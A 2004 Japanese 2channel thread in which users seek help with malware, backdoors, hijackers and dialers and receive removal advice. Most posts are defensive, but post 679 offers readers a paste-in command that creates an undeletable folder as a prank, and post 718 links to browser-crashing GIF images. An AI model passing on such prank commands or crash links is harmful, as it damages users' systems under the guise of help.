会社の違法なところとかを暴露しまくっていたり、違法な内部情報を
暴露しまくっていたのですが、
削除済のホットメールが見られることって有りますでしょうか?

気になって、気になって、派遣契約が終わるのが怖いです。


608 :名無しさん@お腹いっぱい。:04/06/22 23:38
>>607
契約更新なし

609 :575:04/06/22 23:46
>>584
逝ってきました。ノートン先生が激しく反応。システム不安定になって再起動。
しっかり感染してました(はあと)
レジストリ弄って修復してたら( ゚Д゚)マズーな所いじったらしくて再インストしました。
明日またリベンジしまつ。

610 :名無しさん@お腹いっぱい。:04/06/22 23:47
>>609
乙。
セキュリティ管理者?

611 :575:04/06/22 23:54
>>610
いえいえ、OA機器の営業です。
得意先のじじどもがセキュリティ気にしないでひっかかりまくりなんですw
再インストさせろとか言っても「仕事のデータが・・・」と仰ります。
バックアップくらいとっておけよヽ(`Д´)ノウワァン

612 :名無しさん@お腹いっぱい。:04/06/22 23:57
>>611
純粋に感染趣味?
リカバリの手順確認?
俺、ネットワーク管理なんで、、、じじいの応対とかウザイよな。

613 :575:04/06/23 00:39
>>612
手順確認かな、お客様は再インスコせずに直せとw
sasserだとかmsblasterならじじいでも同情できるんだけどね。
エロサイト見たのはおまえじゃねえかよおと思いつつ、明日もレジストリと
格闘してみます。

614 :名無しさん@お腹いっぱい。:04/06/23 00:39
みんな。今晩は。暑いですね。

馬鹿のおれもついにIEからOPERAに変えたんだが気になることがあります。
IEには元からFIREWALLが付いてますがOPERAはどうなんですか?
ZONEALARMとかいれないと危ないですかネエ?
やっぱ馬鹿?

615 :名無しさん@お腹いっぱい。:04/06/23 00:48
>>580
チャレンジャー発見

ttp://higaitaisaku.web.infoseek.co.jp/cgi-bin/cbbs.cgi?mode=one&namber=3750&type=2976&space=30&no=2

616 :612:04/06/23 01:36
>>613


617 :名無しさん@お腹いっぱい。:04/06/23 02:06
>>614
OPERAならハイジャッカーには強いが、「これ、インスコしますか
旦那、ヘヘヘ?」みたいな窓にさくさくYESボタン押してたらいくらOPERA
でもすぐにやられてしまうぞw

IEにファイアウォールはついてない。ついてるのはXP。ただしXPの
ファイアウォールはしょぼいからZone Alarmでも入れとけ。
【セキュリティ】ZoneAlarm Part19
http://pc5.2ch.net/test/read.cgi/sec/1084801676/

618 :614:04/06/23 02:13
>>617 感謝感謝。

619 :名無しさん@お腹いっぱい。:04/06/23 02:46
もし板違いでしたら平にご容赦下さい。

Windows98 SEを使用しております。
少し前から動作がにぶい、フリーズが多い、と思っていたら、ある日突然
立ちあがらなくなりました。
なんとか立ちあがるようにはしたのですが、見るとファイルの位置がバラバラで
元々あったフォルダの中身はカラッポで、見た事も無い数字や英文字の名前が
つけられたフォルダがいくつも形成されていてその中にファイル類が無秩序に
格納されているという有様でした。
(例:ProguramFileの中身がカラッポ>変な数字の新フォルダ内に分かれて格納)

仕方なく一旦HDDをフォーマットして1からやり直そうと思い、重要なデータは
あらかた外部に避難できたのですが、ただ一つ、PGPを使って隠していたデータが
取り出せずに困っています。(愚かにもバックアップも取っていませんでした。)

NewPGPdisk.pgd をクリックして、暗証となる文字列を打ちこめば開いて中の
データが見えるようになる、はずだったのですが、このNewPGPdisk.pgd自体が
削除されてしまったようで見つかりません。

なんとかこのNewPGPdisk.pgdを修復できる方法はないでしょうか?
あるいはそれを通さず、直接隠してあるファイルを取り出す方法は
無いものでしょうか?

一応、友人の勧めで「復元」とファイナルデータ2.0DXを使用してみた所、
それらしいファイルは見当たらず、変わりに#ewpgp~.pgdのように文字化けした
破損ファイルがいくつかあるのですが、試しにそれを復元しても開いてくれません。
(復元、という事は修復はなされていない、という意味なのでしょうか?
ファイナルデータを使ったのは初なので使用法に問題があるのかも。)

※PC初心者板でお聞きした所、そこでは荷が重いのでここかソフトウェア板へ行け
と誘導されて来ました。何卒ご教示、または板違いの場合は誘導よろしくお願い
します。

620 :名無しさん@お腹いっぱい。:04/06/23 02:52
>>619
あきらめろ

621 :619:04/06/23 03:04
>>620
やっぱそうなんですか?(トホホ・・)
PC初心者板でも、

「取り出せたら、PGPの意味がない。」
「復元ソフトはどれも暗号化されたファイルにものすごく弱い。
ブロックをトレースする手がかりがないから。」
「バックアップをとらないのが悪い」

という回答ばかりでしたが・・・。

622 :名無しさん@お腹いっぱい。:04/06/23 03:16
>>621
さらに追い討ちをかけると
そんなに大事なファイルを管理してるなら
「動作が鈍い、フリーズが多い、という故障の前兆をやり過ごすな。」
「せめてWinNT系を使うだろ。」

という回答を追加させていただきます・・・。

623 :619:04/06/23 03:24
>>622
ううう・・・・
ご指摘、ごもっともです。
反省しています。
(と言うか、自分の馬鹿さかげんに腹が立ちっぱなしなんですが。)

と言う事は・・・
もうあきらめてさっさとHDDフォーマットした方がいいんでしょうね。
ご回答に感謝いたします。

624 :名無しさん@お腹いっぱい。:04/06/23 03:32
>>623
フォーマットはNTFSの使えるOSにしたいもんだ。

625 :名無しさん@お腹いっぱい。:04/06/23 05:12
IE開こうとすると変なブラウザが大量に開きウイルスが検出されます。
ノートンで検疫しても検出されないしセーフモードでやっても何も変わりません。
Ad-awareやHijakもやって見つかったスパイウェアを削除しても効果ないです・・・。

もう何していいかわかんない・・・。

626 :名無しさん@お腹いっぱい。:04/06/23 05:15
>>625
データバックアップしたらOSクリーンインストール

627 :名無しさん@お腹いっぱい。:04/06/23 05:31
>>625

Ad awareごときじゃみつからないもんもおおいよ。


628 :名無しさん@お腹いっぱい。:04/06/23 08:04
親のPCにクッキーがブロックできる設定をしてくれと頼まれました。
だいぶ昔の事ですし、もうド忘れてしまいました。本にいくらでも書いて
あるのですが、その本もみつかりません。画面右下に道路標示の進入禁止の
あのマークをだすためにどうすればよいか?手順をお願いします。OSはXPです

629 :名無しさん@お腹いっぱい。:04/06/23 08:16
>>628
[ツール]→[イソターネットオプション]→[プライバスゥイータブ]→[詳細設定]でクキーの
設定です。チェックボックスにチェック。

630 :629:04/06/23 08:20
>>628
[プライバスゥイータブ]でプライバスゥイーを「高」に。

631 :629:04/06/23 08:23
>>628
ああ、すまん。[プライバスゥイータブ]で「高」じゃなく「クキーのブロック」な。

632 :名無しさん@お腹いっぱい。:04/06/23 11:05
>629−631
おお、だんだん思い出したよ(´Д`;)つ旦~
ところですまんが、詳細設定の後「クッキーを〜する」という項目が
6項目ぐらいあるのだがどれを選択すればよいのじゃろうのう?

633 :名無しさん@お腹いっぱい。:04/06/23 11:13
>>632
全部ブロックするんでしょ。
詳細設定を開いて、ファーストパーティー、サードパーティー共にブロック。
クッキー使うサイトには、入れなくなるよ。

634 :名無しさん@お腹いっぱい。:04/06/23 11:24
>>477さま
大変遅レスですいません!問題解決しました。ありがとございます!

635 :名無しさん@お腹いっぱい。:04/06/23 14:54
98SE、ダイアルアップでネット接続をしています。

PFWをノートンからZoneAlarmに変えたのですが。
ノートンの時はせいぜい一時間に数回程度だった外部からの攻撃が、
ZAにしたら1分間で約1回の割合で受けてるようです。
いきなりこんなに増えて、ちょっとガクブルしています。
ノートンとZAでは、検知する感度(?)みたいなものが違うのでしょうか?


636 :635:04/06/23 14:56
sageてしまいました。

637 :名無しさん@お腹いっぱい。:04/06/23 15:42
助けてください。
AVGという無料ウイルス対策ソフトを使った結果なのですが・・・

Virus
Trojan horse BackDoor.Agent.BA
is found in file
C:\WINDOWS\system32\wdmigbn.dll
To remove this virus. please run AVG for windows

とたびたび出て、
「削除できませんでした」と出ました。

手動でも削除ができません。
どうすればいいのでしょうか・・・?
PC初心者なので・・・よろしくお願いいたしますm_m

638 :名無しさん@お腹いっぱい。:04/06/23 15:50
グーグルの

New!あなたのサイトが収入源に。Google WebSearch登場!

をクリックするとセキュリティーの警告が出るんですが?自分だけですか?
このセキュリティーの警告ってなんですか?


639 :>637の追加です・・・:04/06/23 15:57
すいません・・
OSはXPSP1で、ブラウザはIE6以上で、yahooADSL回線です・・

640 :名無しさん@お腹いっぱい。:04/06/23 16:04
>>637

http://www.trendmicro.com/jp/products/desktop/vb/evaluate/trial.htm
ウィルスバスターのおためし版でもためしてみたら、とりあえず
ただだよ。

641 :名無しさん@お腹いっぱい。:04/06/23 16:41
>>638
- サーバー名 "www.google.co.jp" は、証明署名 "www.google.com"に一致しません。

あとは自分で判断してくれ

642 :名無しさん@お腹いっぱい。:04/06/23 16:43
>>637
セーフモードで起動して削除するためにソフトを起動したら、
タスクマネージャを起動して、Explorer.exeを強制終了。
スキャン後に削除出来ないようなら、回復コンソールを起動して、手動削除するしかない。

643 :名無しさん@お腹いっぱい。:04/06/23 16:44
ギコナビを使っているのですが
ttp://monkeythe100th.dyndns.org/uploader/upregist/up0320.gif
にカーソルををあわせただけでエラーが出て強制終了するのですが
これは防ぐ方法がないのでしょうか

644 :名無しさん@お腹いっぱい。:04/06/23 16:48
>>643

それ新型のGIFブラクラっしょ。プレビューを表示させないに
する以外ないな。

645 :名無しさん@お腹いっぱい。:04/06/23 17:00
>>643
どうせ何の画像もないよ

646 :名無しさん@お腹いっぱい。:04/06/23 17:32
OSはXP、IEは6.0です。
いつもネットに繋いだ途端変な外国サイトのIEが勝手に開きます。
セキュリティレベルを下げないとずっとIEが消せなくなってしまいます。
これを表示させないようにできるんでしょうか?
一応その外国サイトのアドレスはhttp://www.angelfire.com/wi3/survey/survey.htmlです。

647 :名無しさん@お腹いっぱい。:04/06/23 17:44
>>646
まず>>1を読め。
答えはそこにある。

648 :名無しさん@お腹いっぱい。:04/06/23 17:54
ネットしてると知らない番号から電話かかってくるんだけど、
IPから即電話番号わかる方法なんてあるの?

649 :名無しさん@お腹いっぱい。:04/06/23 17:55
エロサイト見て、変なダイヤルアップの喰らってれば

650 :名無しさん@お腹いっぱい。:04/06/23 17:59
メールアドレスの質問です。
携帯メールなどでは迷惑メールを防ぐために長くて分かりにくいメールアドレスにする人が
多いですよね?
PCのメールアドレスも同じですか?
長くて分かりにくいアドレスにしたら迷惑メールが少なくなるのですか?
初心者の質問ですみませんがお願いします。




651 :597:04/06/23 18:03
>>598
すいませんテンプレみてなかったです・・・

このスレじゃ駄目ってことはnyに関係があるってことなのかな・・・

652 :名無しさん@お腹いっぱい。:04/06/23 18:10
>>650
あまり効果が無いと思う。
あなたのアドレスを知ってる人のPCがウイルスに感染してたら
ウイルス付のメールが勝手に送られてきたりするし。

653 :名無しさん@お腹いっぱい。:04/06/23 18:10
>>649
意味はわからないけど、
番号当てるか抜くかの方法があって、それを実行してる人間がいるということか。

654 :名無しさん@お腹いっぱい。:04/06/23 18:11
>>650
テンプレ読んで初心者板へ。

655 :名無しさん@お腹いっぱい。:04/06/23 18:21
>>650
私の場合、知り合いにしか教えてないアルファベット3文字のアカウントのメールアドレスに、迷惑メールやウイルスメールが来たことは無い。
だから、長さは関係ないかと。
PCで迷惑メールが来るのは、webで自分がもらした場合がほとんどじゃないかな。

656 :名無しさん@お腹いっぱい。:04/06/23 18:31
655はマイナーなメールサーバーか、どっかの知らないホットメール。
メジャーなところだったら、エロサイトのスパムメールがガンガン送りつけられる。

657 :名無しさん@お腹いっぱい。:04/06/23 18:39
>>655
質問:
よっぽどマイナーなドメイン?または、サーバでウィルスメールカットしてる?
(今時ありえへん)

658 :名無しさん@お腹いっぱい。:04/06/23 19:15
>>646

http://www.safer-networking.org/
spybot S&Dでとりのぞけ

659 :名無しさん@お腹いっぱい。:04/06/23 19:48
物質から誘導されてきました
もの凄い勢いで誰かが質問に答えるスレ9982
http://school4.2ch.net/test/read.cgi/qa/1087986520/85 (質問)
http://school4.2ch.net/test/read.cgi/qa/1087986520/103 (誘導)

助けて下さい

アップローダーにあるzipの中のexeクリックしたら
怖い女の顔と悲鳴が聞こえてとまりません・・・
再起動しても直らないのですが・・・どうしたらいいのでしょう。

バスター入れてるのに・・・ウイルスじゃないのかな。
削除の仕方教えてください・・一定時間ごとに出てきます。怖いです

OS:Xpsp1a ブラウザ;IE セキュリティ:ウイルスバスター2004
やってみたこと:音をミュートにして叫び声を聞かないようにした

660 :名無しさん@お腹いっぱい。:04/06/23 19:55
>>659
スタートアップフォルダの中とか、レジストリのrunのとこにそれらしい
もんがあったさ削除しとけば

661 :名無しさん@お腹いっぱい。:04/06/23 20:01
まどか再来か?

662 :名無しさん@お腹いっぱい。:04/06/23 20:08
>>659
スタート→検索で下記三つのファイルを検索
madoka,ozawa,hikaru
どれかが見つかったら
ttp://pc5.2ch.net/test/read.cgi/sec/1012037926/

663 :名無しさん@お腹いっぱい。:04/06/23 20:09
まどかっていうのですか・・

探してみます。

664 :名無しさん@お腹いっぱい。:04/06/23 20:23
>>662
まずozawa.exeが見つかりました・・・はぁ・・・悲しい

665 :名無しさん@お腹いっぱい。:04/06/23 20:32
>>664
ウイルス混ぜてあるかもしれないから一応オンラインスキャンしといてね。


666 :名無しさん@お腹いっぱい。:04/06/23 20:44
>>664

ozawa.exeか、みたことあったなとおもったら、やっぱジョーク
プログラムみたいね。

http://www.gigazine.net/Backnumber/2001_0720to2002_0131/000886.htm

667 :名無しさん@お腹いっぱい。:04/06/23 21:59
つうか2chねらとか特にその中でもこういう専門板の奴らって99%の奴らは
基礎的なネットワークの知識もなく(ネットで勉強した程度)そのくせ
自分の知識に難癖つけられるとすぐにむきになるよな。キモ過ぎ。
時間帯とか見るとそういう奴に限って真昼間にレスしてるんだよな。
無職のキモヲタばっか。なんかセキュリティの知識がある=人間として優秀とか
勘違いしてるからな。お前らの知識しょぼすぎ。セキュアドすら受からないような
雑魚しかいない

668 :名無しさん@お腹いっぱい。:04/06/23 21:59
そんなに誇示したいのならせめてもう少し知識つけような

669 :名無しさん@お腹いっぱい。:04/06/23 22:04
>>667
それで、お宅は〈爆

670 :659:04/06/23 22:04
皆さんどうもありがとうです。

今全ドライブスキャン中です。

>>666
思いっきりこれですね。中国語でました・・
Hot Soup ってタスクで見ましたので間違いないです。


671 :名無しさん@お腹いっぱい。:04/06/23 22:04
基礎的なネットワークの知識=ネットで勉強した程度
それすら出来ない>>667

672 :名無しさん@お腹いっぱい。:04/06/23 22:06
>>666
駆除プログラムとかがリンク切れになってるけど、
どこで手に入るの?

673 :名無しさん@お腹いっぱい。:04/06/23 22:15
>>667 アッヒャッヒャ!ヽ(゚∀゚)ノアッヒャッヒャ!

674 :名無しさん@お腹いっぱい。:04/06/23 22:33
有料サイトに接続されてるかどうか調べる方法は無いですか??

なんかウイルスにやられて海外サイトに飛ばされたので不安なんですけど。

675 :名無しさん@お腹いっぱい。:04/06/23 22:57
>>672
手動だけど。
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=JOKE_MADO.A

本物のまどかだったら、5回の再起動で無害化するよ。
後はmadoka.exeとozawa.exeを検索して削除すれば問題ない。

676 :名無しさん@お腹いっぱい。:04/06/23 23:04
>>674
ttp://www.emurasoft.com/jp/chintcal/index.htm      No! 国際電話
ttp://mitsu98.fc2web.com/bbs/index2.html         Dial Saver
ttp://www.kddi.com/topics/atx/image.html         ダイヤルアップチェッカー
ソフトだとこのあたりかな?
あとは自分で電話番号の確認をしてみるとか。

677 :名無しさん@お腹いっぱい。:04/06/23 23:10
>>674
>676と重複するけど…
インターネットのプロパティ>接続の「ダイヤルアップと仮想〜設定」で設定した以外の接続が有れば削除。
さらに、インターネットのプロパティ>接続>設定>プロパティ>全般 で電話番号を確認。

Q2や海外のアクセスポイントについての説明と接続を警告してくれるソフトのDLサイト。
ttp://www.kddi.com/topics/atx/image.html

678 :>637 >639:04/06/23 23:44
>>640
ありがとうございます。削除できませんでした・・・><

>>642
>セーフモードで起動して削除するためにソフトを起動したら〜
 ソフトとはAVGのことでしょうか・・・?
 (AGVは削除は隔離ができて、削除ができないようなのです)

>回復コンソールを起動して、手動削除するしかない
これった、記録がきえたりするんでしょうか・・・><

ここに、「回復コンソールは非常に強力であるため、高度な知識を持つユーザーや管理者のみが使用することをお勧めします」 と書いてあるので・・・怖いです・・・><
http://www.microsoft.com/windows2000/ja/server/help/default.asp?url=/windows2000/ja/server/help/the_recovery_console.htm



679 :名無しさん@お腹いっぱい。:04/06/24 01:23
消せないフォルダを作ってみませんか?
MD "\\?\D:\aho."
コマンドプロンプトにコピペしてください。

680 :名無しさん@お腹いっぱい。:04/06/24 01:46
>>678
プリインストールモデルだったら、起動フロッピーディスクを作ってね。
http://support.microsoft.com/default.aspx?scid=kb;JA;307654
http://support.microsoft.com/default.aspx?scid=kb;JA;310994

パスワードはきっと、何も設定していないだろうから、何も入れずにEnterキー
削除時のコマンド
del C:\WINDOWS\system32\wdmigbn.dll

681 :名無しさん@お腹いっぱい。:04/06/24 01:56
>>678

MEとかXPの_restoreフォルダから検出されたら、システムの復元を
しないにしないと、削除できないんだ。コントロールパネルの
システムのとこね。

682 :名無しさん@お腹いっぱい。:04/06/24 03:05
今ラウンジ板の画像鑑定スレを見ていまして、誤鑑定サイトを踏んでしましました。

>スパイだらけだろうが
>「ウィルス:MHTMLRedir.Exploit 」とかが居るね。トテモ有害。

などのレスが後々書いてありました。

今の所の症状はIEのホームがよくわからないところになってました、自分で変更済み。
お気に入りに自分で追加したのではない、おそらくアダルトサイトへのリンクがありました、削除した方がいいですか?

あとテンプレに行き、システムの復元をしましたが、お気に入りのサイトは残ったままでした。
その後、スパイウェア駆除ツールも試しましたが、クリーンと出ました。

とりあえず、ウイルスなんかに感染しているか不安です、アドバイスお願いします。

ちなみにウイルス駆除ソフトはいれてないです、
ソースネクスト社のは持ってますが、評判悪かったのでまだインストールしていません。
返品して評判の良いノートンかバスターとやらを買おうかなと思っていた矢先の事でした・・ウカツでした。

ではお願いします。

683 :682:04/06/24 03:07
あ、OSはMEです。

あとソースネクスト社のウイルスセキリュティー2004ってソフトです。
普通に使えるソフトですか?
ノートンやバスターにした方が良いでしょうか?

684 :名無しさん@お腹いっぱい。:04/06/24 03:25
>>683

バスターでいいんじゃないですか。アダルトサイトのブックマークは
不必要であれば削除したほうがいいです

685 :名無しさん@お腹いっぱい。:04/06/24 04:53
>683
それは普通じゃありません。感染していても発見すら出来ない番犬です。
マトモに動作しないと連絡した上で発売元に返品しましょう。
返品補償付きの筈です。

ノートンやバスターの方が良いでしょうね。

686 :名無しさん@お腹いっぱい。:04/06/24 05:11
Ad-aware 6.0、CWShredder、Spybot - Search & Destroy、極めはa2で、
全て完全検索、修正、削除、セーフモードででも同様のことを繰り返し、
対処したのですが、未だにウィルスが勝手に悪質サイトからDLされ、
ウィルスバスターのリアルタイムウィルス検索がDLされたウィルスを発見してくるんですが・・・・
OSはMeです。
動作も以前よりかなり重いです。
ウィルス名・・というか、感染しているファイルかもしれませんが、
全て123946.EXEと表記されています。これはどうすれば・・・・

687 :名無しさん@お腹いっぱい。:04/06/24 05:14
全て、というのはDLされてくるファイルが全部が全部ということです。
全部、上記の名前のファイルにばかり感染、か、上記のがウィルスの名前ならDLされます。

688 :682:04/06/24 05:28
>>684
自分の場合被害はこれぐらいですかね?
ウイルスとか多分まだ感染したことないので今のところなんとも言えないのが不安です。

>>685
やはり安かろう悪かろうですか・・・

ちなみに感染した後にノートンやバスターをインストールしても、ちゃんと駆除してくれますか?
それでほぼ問題なくなる様でしたら明日買ってきてインストールしたいと思います。



689 :名無しさん@お腹いっぱい。:04/06/24 05:42
>>688
感染したファイルを駆除してくれるのがアンチウィルスソフトです。
大丈夫です。
それぐらいの被害で済むかどうかは、MHTMLRedir.Exploitか、
ノートンやバスターで検索して、他のウィルス(がある場合)そのウィルスのをウィルス名で
検索掛ければ詳細が出てくるので、それを参照に。

690 :名無しさん@お腹いっぱい。:04/06/24 05:58
>>686

とりあえず、ctrl + alt + deleteでプログラム強制終了にして
internet, explorer, systray以外のを全部終了させれば
とりあえず、DLは止まるとおもうけど。MEだったら
msconfig.exeあるんで、スタート−ファイル名を指定して実行
でmsconfigにしてスタートアップにへんなファイルはいって
ないか確認する。

123946.EXEは、どうも複製みたいで親がいる可能性高いよ。


691 :名無しさん@お腹いっぱい。:04/06/24 06:03
>>699
ノートン先生で感染ファイルがあると表示されてもそれを削除できないのはなぜ?
Obem.dellというファイルがAdwareに感染しているとでるんだけど削除できませ
どなたか解決法を教えてください

692 :686:04/06/24 06:05
>>690
うーん。スタートアップを確認してみましたが、
自分、システムファイルについてそんなに詳しくないので、
どれが正当でどれが怪しいかほとんど分かりませんでした・・・
下のほうにhatchinside.exeっていうのがありましたが、これは普通ですか?

693 :名無しさん@お腹いっぱい。:04/06/24 06:07
>>691
まず、>>699ってなぜ?

694 :名無しさん@お腹いっぱい。:04/06/24 06:14
>>692

HatchInsideは、URLの代わりに"インターネット番号"を入力することで
Webアクセスを簡易化するツールです。使わないならはずしちゃって
かまわないです。ウィルスじゃないけど。

よくわかんないファイルがスタートアップにあったらファイル名を
サーチエンジンに行って検索して、いろいろ読んでいくとどんな
もんかわかってきます。

695 :名無しさん@お腹いっぱい。:04/06/24 06:17
>>691

MEとかXPだと_restore フォルダの中のもんは、消せないんです。
システムの復元をしない、にしないと。あと実行中のプログラムは
削除できないんで、690のやりかたで強制終了させてから、
ノートン先生で、やってみて。


696 :名無しさん@お腹いっぱい。:04/06/24 06:20
>>694
なるほど・・・。使ったことないし、ブラウザにお気に入りって機能がついてるのに、
需要ないだろ、って思ってたので消そうと思います。

なるほど。分からないのをぐぐりながら対処してみます。
それでも駄目なら・・また来てみます・・・・

697 :696:04/06/24 06:50
ヤバイです・・・先に重いと書きましたが、
更に激重になってきました。再起動しても一向に変化なし。何をしても物凄く重すぎます。
その上、何故かHDの容量がどんどん減ってきてます。ついに、かなり痛いウィルスDLされたのでしょうか?

>>692
注目するのは、、スタートアップだけですか?だったら二つしかないんですが・・・

698 :名無しさん@お腹いっぱい。:04/06/24 06:55
>>697

ううん、とりあえず消えたらまずいファイルを避難させときましょう。
俺でもちょっと、PCを直接みてみないとわからないな。

699 :名無しさん@お腹いっぱい。:04/06/24 07:16
>>697

とりあえずTemporary internet filesフォルダの中身と
TEMPフォルダの中身を空にすればいくらかかせげます。
フォルダ自体は削除しないでね。


700 :名無しさん@お腹いっぱい。:04/06/24 10:22
>>656
>>657
遅レスですまない。
IIJ4U使ってるが、あれはマイナーか…ある意味そうかもしれないなw
ウイルスチェックサービスは使ってない。
SPAMやウイルスメールは本当に来た事が無い。

701 :名無しさん@お腹いっぱい。:04/06/24 10:29
>>692
WebSiteViewer / TIB Browser
ttp://higaitaisaku.web.infoseek.co.jp/cgi-bin/ht/database.cgi?cmd=dp&num=177

702 :682:04/06/24 12:02
>>689

オンラインウイルスチェックしてみました。
やはり感染してました・・全部調べるのには推定6時間ぐらいかかりそうなので途中でやめましたが。

c:\_RESTORE\TEMP\A0309137.CPY は Backdoor.HackDefender に感染しています。
c:\_RESTORE\TEMP\A0309138.CPY は Backdoor.HackDefender に感染しています。
c:\_RESTORE\TEMP\A0309139.CPY は Backdoor.HackDefender に感染しています。
c:\_RESTORE\TEMP\A0309140.CPY は Backdoor.HackDefender に感染しています。
c:\_RESTORE\TEMP\A0309141.CPY は Backdoor.HackDefender に感染しています。
c:\_RESTORE\TEMP\A0309142.CPY は Backdoor.HackDefender に感染しています。
c:\_RESTORE\TEMP\A0309144.CPY は Backdoor.Ranky に感染しています。
c:\WINDOWS\Application Data\svhost.exe は Backdoor.HackDefender に感染しています。

この様な結果が出ました、これらはどういう被害をもたらすウイルスなのでしょうか?
またノートンやバスターでちゃんと駆除できますか?


あとノートンとバスターはどの様な違いがありますか?
特徴を教えていただけると嬉しいです。

703 :名無しさん@お腹いっぱい。:04/06/24 12:27
>>702
>>689も書いてくれてるけど、ウィルス名で検索くらいかけたらどう?
http://www.symantec.com/region/jp/sarcj/data/b/backdoor.hackdefender.html

704 :名無しさん@お腹いっぱい。:04/06/24 12:31
>>702
Hackerdefenderは悪プロセスを不可視化して隠匿する超悪質ツール
http://higaitaisaku.web.infoseek.co.jp/removehacdef.html

とりあえず、
 ファイル名を指定して実行→cmd→net stop hackerdefender100(リターン)
とやってみ。「指定されたサービスはインストールされたサービスとして
存在しません」以外のエラーメッセージが出たら感染していない。それ以外
なら作動が止まったはず。

hxdef*でHDDを検索→見つかったファイルをhxdef.exe→hxdef.exe.safe
のようにリネームする。
「エロサイト見たら…」スレのまとめサイト見て
http://haiiro.info/my/text/template.html
「応急処置」実行する。

NAVとVBはほとんど違いない。好きなほうを入れろ。ただしシマンテックでも
NISはおまけ機能満載で激重、アップデートの不具合など問題多過ぎ。敬遠。

あと手動削除情報はトレンドが詳しい。シマンテックのウィルスDBは「ノートン
使え」というだけでお終い。

705 :名無しさん@お腹いっぱい。:04/06/24 12:32
>>702
Backdoor.HackDefender(symantec)
ttp://www.symantec.com/region/jp/sarcj/data/b/backdoor.hackdefender.html

BKDR_HACDEF.73.A(trendmicro)
ttp://www.trendmicro.co.jp/vinfo/virusencyclo/default5.asp?VName=BKDR_HACDEF.73.A

Backdoor.HacDef.073.a(a-2)
ttp://www.a-2.org/en/malware/?Backdoor.HacDef.073.a

a2のサイトFreeもアリ
ttp://www.a-2.org/en/

どれでも好きな方法でドゾ。

706 :名無しさん@お腹いっぱい。:04/06/24 12:32
>>704 スマソ。
「指定されたサービスはインストールされたサービスとして
存在しません」以外の ×

「指定されたサービスはインストールされたサービスとして
存在しません」という ○

707 :682:04/06/24 12:44
>>703
すいませんでした。
>>704
怖いです・・・
>Hackerdefenderは悪プロセスを不可視化して隠匿する超悪質ツール
具体的にとの様な被害を受けるのでしょうか?

ちなみにバスターすぐ買ってきます、今の状態でバスターをインストールすれば駆除できますか?
それとも書いてある応急処置をしてからじゃないとダメですか?
初めてなもので焦ってます。

>>705
それらで駆除できますか?
一応覗いてみます、ありがとうございます。

708 :682:04/06/24 12:51
>>705

MEは被害を受けない様なこと書いてありますが・・・
そんなことあるのですか?

バスターでちゃんと駆除できるみたいですね?
自分でいじくるのは怖いのでやっぱ買ってきます。

709 :名無しさん@お腹いっぱい。:04/06/24 13:10
>>708
もう一度見直したらものすごいの混ざってた。
Backdoor.Ranky
ttp://www.symantec.com/region/jp/sarcj/data/b/backdoor.ranky.html

複合攻撃を受けてる可能性が高いね。
バスターなりで駆除したら、
>>704さんの紹介してくれてるサイトに行った方がいいね。

710 :682:04/06/24 13:26
バスター買ってきました、
今からインストールします。

>>709
詳しく教えてください、マジで怖いです・・・

711 :名無しさん@お腹いっぱい。:04/06/24 13:29
>>710
全部ネットで調べられることなのに、教えてくださいなの?

712 :名無しさん@お腹いっぱい。:04/06/24 13:37
>>710

どうもバックドア型はいってるみたいなんで、ネットと接続してると
誰かが不正アクセスしてくる恐れあり。ウィルス駆除やるとき、
ネットと接続切っておいたほうがいいな。

713 :名無しさん@お腹いっぱい。:04/06/24 13:42
>>712
感染していないPCで定義ファイルを最新にする必要はある。

714 :名無しさん@お腹いっぱい。:04/06/24 13:57
>>713

そうだな、確かに。ほんとはオンラインスキャンが使えればいいんだけど
バックドアがいるとちょっと問題だな。誰かに操作されるおそれがある。


715 :名無しさん@お腹いっぱい。:04/06/24 13:58
オンラインスキャンって何処で出来るの?

716 :名無しさん@お腹いっぱい。:04/06/24 14:01
>>715
それも回答待つの?テンプレ読んでる?それに自分で調べた方が早いでしょ

717 :名無しさん@お腹いっぱい。:04/06/24 14:01
さまざまなアプリケーションを異常終了させるGIF画像がネット上に流出
http://www.forest.impress.co.jp/article/2004/06/24/gifcrush.html

異常終了するようなGIFファイルの例ってどこにありますか??

718 :名無しさん@お腹いっぱい。:04/06/24 14:03
>>717
ここにある
ttp://news12.2ch.net/test/read.cgi/news/1087909997/

719 :名無しさん@お腹いっぱい。:04/06/24 14:04
>>717
誰かか貼れば、被害が増えていく訳だがな。

720 :名無しさん@お腹いっぱい。:04/06/24 14:07
>>718 ありがとうございました。
>>719 以後気をつけます。

721 :名無しさん@お腹いっぱい。:04/06/24 14:25
>>717
何の脳もねえ解析結果、がくん(+_+)
GIF画像のソースの解析も出来ないの?(@_@)

722 :名無しさん@お腹いっぱい。:04/06/24 14:28
>>721
誤爆ですか?

723 :名無しさん@お腹いっぱい。:04/06/24 14:41
>>718
これってさあ、一度目は×画像が表示されるから、何の画像なのかな?って、画像の更新させると落ちるんだよね。
今の所、ウィルスもスパイウェアも反応しないから、たぶん無害なんだと思うんだけど、
新種のウィルスでも埋め込まれてあったら、後で大騒ぎになるんだろうな!

724 :名無しさん@お腹いっぱい。:04/06/24 15:03
>>715
トレンドマイクロ社のとこ
http://www.trendmicro.com/jp/home/enterprise.htm

725 :名無しさん@お腹いっぱい。:04/06/24 15:04
>>723

新型ブラクラです

726 :682:04/06/24 15:10
>>711
すいません。
>>712
バスターインストールしたのですが、メイン画面を開くが一向に開けないのですが・・・
ちゃんと右下にアイコンが出てます、右クリックも効くのですが、開くところまで行きません、
説明書読む限りメイン画面を開くとウイルス検索ができるみたいなのですが・・・

あとバスターをインストールしてから結構重くなってしましました。
ネット接続は切ってからウイルス検索した方がいいらしいですが、
アップデートしてない状態でもこのウイルスは駆除できますか?

>>713
PCは一台しかもっていません。
>>714
今の状態でやっても大丈夫でしょうか?



727 :名無しさん@お腹いっぱい。:04/06/24 16:19
>>726

まずctrl + alt + deleteで、internet, explorer, systray以外の
プログラムを強制終了させてから、ウィルスバスター開いて
みて。とりあえず、アップデートしてなくても昔のウィルス
なら駆除できます、最新のはだめだけど。インストールの
時にトロイの木馬はチェックしてくれるんで、

728 :名無しさん@お腹いっぱい。:04/06/24 16:36
>>726
Windowsをセーフモードで立ち上げて、そこからウイルスバスターを起動しても駄目かい?

729 :名無しさん@お腹いっぱい。:04/06/24 17:21
SPYBOTでファイルが検出されたのですが
どうやって駆除すれば良いのかわかりません。
なぜか、日本語が選択できなかったのです。
教えてくださいませ。

730 :名無しさん@お腹いっぱい。:04/06/24 17:30
>>729
フォントをMS-UIゴシックを選んで日本語を選択、
ここで、日本語フォントにしておかないと、烈しく文字化けして、なんだかわからなくなる。
